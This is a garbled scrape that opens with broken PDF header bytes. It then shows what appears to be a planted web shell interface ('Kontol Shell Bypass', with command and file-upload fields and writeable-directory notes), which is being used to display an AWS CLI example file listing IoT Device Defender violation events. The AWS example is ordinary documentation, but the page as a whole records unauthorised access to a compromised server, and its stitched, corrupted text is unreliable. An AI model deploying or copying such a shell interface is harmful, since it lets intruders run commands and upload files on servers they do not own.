%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/iot/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/iot/list-violation-events.rst
**To list the security profile violations during a time period**

The following ``list-violation-events`` example lists violations that occurred between June 5, 2019 and June 12, 2019 for all AWS IoT Device Defender security profiles for the current AWS account and AWS Region. ::

    aws iot list-violation-events \
        --start-time 1559747125 \
        --end-time 1560351925

Output::

    {
        "violationEvents": [
            {
                "violationId": "174db59167fa474c80a652ad1583fd44",
                "thingName": "iotconsole-1560269126751-1",
                "securityProfileName": "Testprofile",
                "behavior": {
                    "name": "Authorization",
                    "metric": "aws:num-authorization-failures",
                    "criteria": {
                        "comparisonOperator": "greater-than",
                        "value": {
                            "count": 10
                        },
                        "durationSeconds": 300,
                        "consecutiveDatapointsToAlarm": 1,
                        "consecutiveDatapointsToClear": 1
                    }
                },
                "metricValue": {
                    "count": 0
                },
                "violationEventType": "in-alarm",
                "violationEventTime": 1560279000.0
            },
            {
                "violationId": "c8a9466a093d3b7b35cd44ca58bdbeab",
                "thingName": "TvnQoEoU",
                "securityProfileName": "Testprofile",
                "behavior": {
                    "name": "CellularBandwidth",
                    "metric": "aws:message-byte-size",
                    "criteria": {
                        "comparisonOperator": "greater-than",
                        "value": {
                            "count": 128
                        },
                        "consecutiveDatapointsToAlarm": 1,
                        "consecutiveDatapointsToClear": 1
                    }
                },
                "metricValue": {
                    "count": 110
                },
                "violationEventType": "in-alarm",
                "violationEventTime": 1560276600.0
            },
            {
                "violationId": "74aa393adea02e6648f3ac362beed55e",
                "thingName": "iotconsole-1560269232412-2",
                "securityProfileName": "Testprofile",
                "behavior": {
                    "name": "Authorization",
                    "metric": "aws:num-authorization-failures",
                    "criteria": {
                        "comparisonOperator": "greater-than",
                        "value": {
                            "count": 10
                        },
                        "durationSeconds": 300,
                        "consecutiveDatapointsToAlarm": 1,
                        "consecutiveDatapointsToClear": 1
                    }
                },
                "metricValue": {
                    "count": 0
                },
                "violationEventType": "in-alarm",
                "violationEventTime": 1560276600.0
            },
            {
                "violationId": "1e6ab5f7cf39a1466fcd154e1377e406",
                "thingName": "TvnQoEoU",
                "securityProfileName": "Testprofile",
                "behavior": {
                    "name": "Authorization",
                    "metric": "aws:num-authorization-failures",
                    "criteria": {
                        "comparisonOperator": "greater-than",
                        "value": {
                            "count": 10
                        },
                        "durationSeconds": 300,
                        "consecutiveDatapointsToAlarm": 1,
                        "consecutiveDatapointsToClear": 1
                    }
                },
                "metricValue": {
                    "count": 0
                },
                "violationEventType": "in-alarm",
                "violationEventTime": 1560276600.0
            }
        ]
    }

For more information, see `Detect Commands <https://docs.aws.amazon.com/iot/latest/developerguide/DetectCommands.html>`__ in the *AWS IoT Developer Guide*.

Kontol Shell Bypass